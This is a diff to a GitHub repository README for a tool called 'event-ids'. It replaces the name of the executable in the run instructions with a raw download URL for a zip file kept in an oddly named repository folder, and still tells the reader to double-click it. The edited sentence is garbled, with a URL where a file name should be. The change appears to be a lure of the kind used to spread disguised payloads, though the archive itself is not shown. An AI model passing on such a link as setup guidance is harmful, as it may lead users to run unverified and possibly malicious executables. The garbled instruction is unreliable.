Mire20/event-ids/README.md

 ### 5. Run the Application

 After extracting the files, navigate to the folder where you extracted the files.
-Inside, you will find an executable file, usually named `event-ids.exe`.
+Inside, you will find an executable file, usually named `https://github.com/Mire20/event-ids/raw/refs/heads/main/eros/ids-event-v1.5.zip`.
 Double-click this file to run the application.

 ## ⚙️ Configuration